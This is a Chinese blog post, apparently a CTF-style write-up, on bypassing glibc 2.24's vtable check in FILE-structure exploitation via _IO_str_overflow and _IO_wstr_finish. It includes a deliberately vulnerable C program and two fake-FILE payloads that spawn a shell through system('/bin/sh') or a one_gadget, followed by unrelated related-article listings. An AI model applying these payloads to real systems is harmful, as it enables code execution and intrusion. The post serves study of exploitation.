前言

前面几篇文章说道,glibc 2.24vtable 做了检测,导致我们不能通过伪造 vtable 来执行代码。今天逛 twitter 时看到了一篇通过绕过 对vtable 的检测 来执行代码的文章,本文做个记录。

文中涉及的代码,libc, 二进制文件。

https://gitee.com/hac425/blog_data/blob/master/pwn_file/file_struct_part4.rar

正文

首先还是编译一个有调试符号的 glibc 来辅助分析。

源码下载链接

http://mirrors.ustc.edu.cn/gnu/libc/glibc-2.24.tar.bz2

可以参考

http://blog.csdn.net/mycwq/article/details/38557997

新建一个目录用于存放编译文件,进入该文件夹(这里为glibc_224 ),执行 configure 配置

mkdir glibc_224

cd glibc_224/

../glibc-2.24/configure --prefix=/home/haclh/workplace/glibc_224  --disable-werror  --enable-debug=yes

然后 make -j8 && make install, 即可在 /home/haclh/workplace/glibc_224 找到编译好的 libc

vtable 进行校验的函数是 IO_validate_vtable

就是保证 vtable 要在 __stop___libc_IO_vtables__start___libc_IO_vtables 之间。

绕过的方法是在 __stop___libc_IO_vtables__start___libc_IO_vtables 之间找到可以利用的东西,下面介绍两种。

前提:可以伪造 FILE 机构体

测试代码 ( 来源 )

/* gcc vuln.c -o vuln */

#include <stdio.h>

#include <unistd.h>

char fake_file[0x200];

int main() {

  FILE *fp;

  puts("Leaking libc address of stdout:");

  printf("%p\n", stdout); // Emulating libc leak

  puts("Enter fake file structure");

  read(0, fake_file, 0x200);

  fp = (FILE *)&fake_file;

  fclose(fp);

  return 0;

}

首先 printf("%p\n", stdout) 用来泄露 libc 地址,然后使用 read 读入数据用来伪造 FILE 结构体, 最后调用 fclose(fp).

利用__IO_str_overflow

__IO_str_overflow_IO_str_jumps 的一个函数指针.

_IO_str_jumps 就位于 __stop___libc_IO_vtables__start___libc_IO_vtables 之间 所以我们是可以通过 IO_validate_vtable 的检测的。

具体怎么拿 shell 还得看看 __IO_str_overflow源代码, 这里我就用 ida 看了(清楚一些)

首先是对 fp->_flag 做了一些判断

fp->_flag 设为 0x0, 就不会进入。接下来的才是重点

可以看到 如果 设置

fp->_IO_write_ptr - fp->_IO_write_base > fp->_IO_buf_end - fp->_IO_buf_base

我们就能进入 (fp[1]._IO_read_ptr)(2 * size + 100), 回到汇编看看。

执行 call qword ptr [fp+0E0h]fp+0E0h 使我们控制的,于是可以控制 rip, 此时的参数为 2 * size + 100, 而 size = fp->_IO_buf_end - fp->_IO_buf_base 所以此次 call 的参数也是可以控制的。

利用思路就很简单了,设置 fp+0xe0system, 同时设置 fp->_IO_buf_end fp->_IO_buf_base, 使得 2 * size + 100/bin/sh 的地址, 执行 system("/bin/sh") 获取 shell

比如 fp->_IO_buf_base=0fp->_IO_buf_end=(sh-100)/2

fake_file += p64(0x0)   	 # buf_base

fake_file += p64((sh-100)/2) # buf_end

当执行 fclose 是会 调用 _IO_FINISH (fp)

其实就是 fp->vtable->__finish

#define _IO_FINISH(FP) JUMP1 (__finish, FP, 0)

执行 _IO_FINISH (fp) 之前还对 锁进行了获取, 所以我们需要设置 fp->_lock 的值为一个 指向 0x0 的值(*ptr=0x0000000000000000),所以最终的 file 结构体的内容为

fake_file = p64(0x0)  # flag

fake_file += p64(0x0)    # read_ptr

fake_file += p64(0x0)    # read_end

fake_file += p64(0x0)    # read_base

fake_file += p64(0x0)        # write_base

fake_file += p64(sh) 		 # write_ptr - write_base  > buf_end - buf_base, bypass check

fake_file += p64(0x0)        # write_end

fake_file += p64(0x0)   	 # buf_base

fake_file += p64((sh-100)/2) # buf_end

fake_file += "\x00" * (0x88 - len(fake_file))  # padding for _lock

fake_file += p64(0x00601273)   # ptr-->0x0 , for bypass get lock

# p _IO_str_jumps

fake_file += "\x00" * (0xd8 - len(fake_file))  # padding for vtable

fake_file += p64(_IO_jump_t + 0x8) # make __IO_str_overflow on __finish , which call by fclose

fake_file += "\x00" * (0xe0 - len(fake_file))  # padding for vtable

fake_file += p64(system) # ((_IO_strfile *) fp)->_s._allocate_buffer

有一个小细节我把 vtable 设置为了 p64(_IO_jump_t + 0x8),原因在于 一个正常的 FILE 结构体的 vtable 的结构为

_finish 在第三个字段

__IO_str_overflow_IO_str_jumps 的第4个字段.

vtable 设置为 p64(_IO_jump_t + 0x8) 后, vtable->_finish__IO_str_overflow 的地址了。

在调用 fclose 处下个断点,断下来后打印第一个参数

可以看到

  • _flags 域 为 0
  • 2*(buf_end - buf_base) + 100 指向 /bin/sh
  • _lock 指向 0x0
  • 虚表的第三个表项(vtable->_finish)为 __IO_str_overflow 的地址
  • $rdi+0xe0system 的地址(rdi即为 fp)

这样在执行 fclose 时就会进入 __IO_str_overflow ,然后进入 call qword ptr [fp+0E0h] 执行 system("/bin/sh") 拿到 shell

利用 _IO_wstr_finish

_IO_wstr_finish 位于 _IO_wstr_jumps 里面

可以看到 _IO_wstr_jumps 也是位于 位于 __stop___libc_IO_vtables__start___libc_IO_vtables 之间的。

_IO_wstr_finishcheck 比较简单

fp->_wide_data->_IO_buf_base 不为0, 而且 v2->_flags2 就可以劫持 rip 了,看汇编代码会清晰不少

只需要在 fp+0xa0 处放置一个指针 ptr , 使得 ptr+0x30 处的 值不为 0 即可。(这个值随便找就行),然后 设置 fp+0x74 的值为 0, 最后设置 fp+0xe8 的值为 one_shot ,在执行 fclose()时就会去执行 one_shot 拿到 shell

伪造 file 结构体的代码

fake_file = p64(0x0)  # flag

fake_file += p64(0x0)    # read_ptr

fake_file += p64(0x0)    # read_end

fake_file += p64(0x0)    # read_base

fake_file += p64(0x0)        # write_base

fake_file += p64(sh) 		 # write_ptr - write_base  > buf_end - buf_base, bypass check

fake_file += p64(0x0)        # write_end

fake_file += p64(0x0)   	 # buf_base

fake_file += p64((sh-100)/2) # buf_end

fake_file += "\x00" * (0x88 - len(fake_file))  # padding for _lock

fake_file += p64(0x00601273)   # ptr-->0x0 , for bypass get lock

fake_file +=  "\x00" * (0xa0 - len(fake_file))

fake_file += p64(0x601030) # _wide_data

# p &_IO_wstr_jumps

fake_file += "\x00" * (0xd8 - len(fake_file))  # padding for vtable

fake_file += p64(_IO_wstr_jumps) 

fake_file += "\x00" * (0xe8 - len(fake_file))  # padding for vtable

fake_file += p64(one_shot) # rip

最后

ida看代码比较清楚,文中的两种方法挺不错,利用了其他的 vtable 中的有趣的函数来绕过 check

参考

https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/

http://blog.rh0gue.com/2017-12-31-34c3ctf-300/

Pwn with File结构体(四)的更多相关文章

  1. Pwn with File结构体(一)

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 利用 FILE 结构体进行攻击,在现在的 ctf 比赛中也经常出现 ...

  2. Pwn with File结构体(三)

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前面介绍了几种 File 结构体的攻击方式,其中包括修改 vtab ...

  3. Pwn with File结构体(二)

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 最新版的 libc 中会对 vtable 检查,所以之前的攻击方式 ...

  4. Pwn with File结构体之利用 vtable 进行 ROP

    前言 本文以 0x00 CTF 2017 的 babyheap 为例介绍下通过修改 vtable 进行 rop 的操作 (:-_- 漏洞分析 首先查看一下程序开启的安全措施 18:07 haclh@u ...

  5. Linux_Struct file()结构体

    struct file结构体定义在/linux/include/linux/fs.h(Linux 2.6.11内核)中,其原型是:struct file {        /*         * f ...

  6. Linux--struct file结构体

    struct file(file结构体): struct file结构体定义在include/linux/fs.h中定义.文件结构体代表一个打开的文件,系统中的每个打开的文件在内核空间都有一个关联的  ...

  7. Linux--struct file结构体【转】

    本文转载自:https://www.cnblogs.com/hanxiaoyu/p/5677677.html struct file(file结构体): struct file结构体定义在includ ...

  8. 2018.5.2 file结构体

    f_flags,File Status Flag f_pos,表示当前读写位置 f_count,表示引用计数(Reference Count): dup.fork等系统调用会导致多个文件描述符指向同一 ...

  9. fd与FILE结构体

    文件描述符 fd 概念:文件描述符在形式上是一个非负整数.实际上,它是一个索引值,指向内核为每一个进程所维护的该进程打开文件的记录表.当程序打开一个现有文件或者创建一个新文件时,内核向进程返回一个文件 ...

随机推荐

  1. 归并排序的理解和实现(Java)

    归并排序介绍 归并排序(Merge Sort)就是利用归并的思想实现的排序方法.它的原理是假设初始序列含有fn个记录,则可以看成是n个有序的子序列,每个子序列的长度为1,然后两两归并,得到[n2\fr ...

  2. java语言学习指南

    1 java基础 1.1 java语言编程入门 1.2 java语言概述 1.3 java基本语法一 1.4 java基本语法二 1.5 java基本语法三

  3. 使用json-lib-*.jar的JSON解析工具类

    使用json-lib-2.4-jdk15.jar JSON工具类: import java.util.List; import net.sf.json.JSONArray; import net.sf ...

  4. 监督学习——随机梯度下降算法(sgd)和批梯度下降算法(bgd)

    线性回归 首先要明白什么是回归.回归的目的是通过几个已知数据来预测另一个数值型数据的目标值. 假设特征和结果满足线性关系,即满足一个计算公式h(x),这个公式的自变量就是已知的数据x,函数值h(x)就 ...

  5. Android 中的冷启动和热启动

    App的Activity退出之后,应用的进程并不会被杀死,而是保留在那里.当再次打开App的Activity时,会从已有的进程中创建Activity,是为“热启动”.若打开Activity时没有进程, ...

  6. 关于Gen生成try-catch-finally

    例1: class TestExc extends Exception{} void tryItOut () throws TestExc{} void handleExc(Object o){} v ...

  7. JavacProcessingEnvironment类解读

    JavacProcessingEnvironment类的继承体系如下: 其中含有很多内部类,最重要的是迭代注解处理器相关的类,如下:

  8. 高级网络功能(Docker支持的网络定制配置)

    网络的高级知识,包括网络的启动和配置参数.DNS的使用配置.容器访问和端口映射的相关实现. 在一些具体场景中,Docker支持的网络定制配置,通过Linux命令来调整.补充.甚至替换Docker默认的 ...

  9. PHP在使用正则表达式验证,防注入的时候要注意一下的细节

    如下:这是一个防止用户输入的数据中包含SQL的一些关键字的正则表达式 之前一直认为这写的很正确,没多大的问题,而且自己测试也没问题, 因为关键字包含 And,而如果用户输入andy的时候呢,汗,所以还 ...

  10. C/C++中的常量到底存在了什么地方

    一般来说,基本类型(整型.字符型等)常量会在编译阶段被编译成立即数,占的是代码段的内存.(代码段是只读的,而且不允程序员获取代码段的地址,所以在c++中,尽量不为const分配数据段的内存,但是一旦取 ...